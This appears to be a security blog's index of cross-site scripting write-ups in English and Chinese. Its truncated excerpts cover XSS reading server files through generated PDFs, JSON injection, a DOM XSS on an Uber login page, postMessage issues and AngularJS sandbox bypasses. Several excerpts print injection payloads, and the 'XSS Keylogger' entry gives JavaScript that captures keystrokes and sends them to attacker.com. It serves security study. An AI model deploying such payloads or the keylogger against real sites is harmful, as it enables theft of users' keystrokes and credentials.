Local File read via xss in dynamically genearated pdf

Introduction 本文介绍了如何利用xss读取服务器文件,并将其打印在pdf。 https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=xyz&date... utrnumber存在xss injection point. Payload 1: 在下载的pdf中,发现aaaa. <p id="test">aaa</p><script>document.getElementById('test').innerHTML+='aa'</script> Payload 2: 在下载的pdf中,显示了pdf的路径,如file://... <…

Story of a JSON XSS

假设存在如下injection_point, content_type: text/html. { "xxx": true, "yyy": [injection_point] } Payload 1 - Failure yyy=test<haha> 但是injection_point会将<> HTML转置. { "xxx": true, "yyy": <strong>test&lt;haha&gt;</strong> } Payload 2 - Failure yyy[testarray]…

XSS Keylogger

k.js keys = ""; document.onkeypress = function(e){ get = window.event? event:e; key = get.keyCode? get.KeyCode:get.charCode; key = String.fromCharCode(key); keys +=key; } setInterval(function(){ fetch('//attacker.com/k.php?k=' + keys); }, 1000); k.php <?php $k = $_GET["k"]; if(!empty(…

DOM Xss in auth.uber.com

Background Affected Link: https://auth.uber.com/login/?next_url=https%3A%2F%2Faccounts.uber.com%2Fprofile%2F&state=CISjEn7fDHVmQybjIOq_ZfPU8cVhJh9mOSsme-LYJUo%3D Decoded as: https://auth.uber.com/login/?next_url=https://accounts.uber.com/profile/&state=CISjEn7fDHVmQybjIOq_ZfPU8cVhJh9mOSsme-LYJUo= next_url: 这个param制定了redirect的地方。 Open Direct https://auth.uber.com/…

Xss and Postmessage

1. SOP // HTML of attack.com <iframe src="http://mybank.com/balance" name="mybank"></iframe> <script> document.getElementsByName('mybank')[0].onload = function() { frames[0].getElementById("message").innerHTML = "Hello World."; } </script> //HTML of mybank.com/…

Cross Site Scripting Bypass

zseano | UK Security Researcher 介绍了多种 bypass xss 的方法. 最有创意的是, 注册三个用户, 用三个用户 input payload 的各个部分, 最后当页面 render 的时候,就砌成一个完整的 payload.…

Angular XSS Series

Payload List PortSwigger Web Security Blog: XSS without HTML: Client-Side Template Injection with AngularJS 0x00. Introducing the AngularJS Javascript Framework - XSS in AngularJS Video 0x1. Sandbox Bypass in Version 1.0.8 - XSS with AngularJS Video 0x2. New Sandbox Bypass in 1.4.7 - XSS in AngularJS…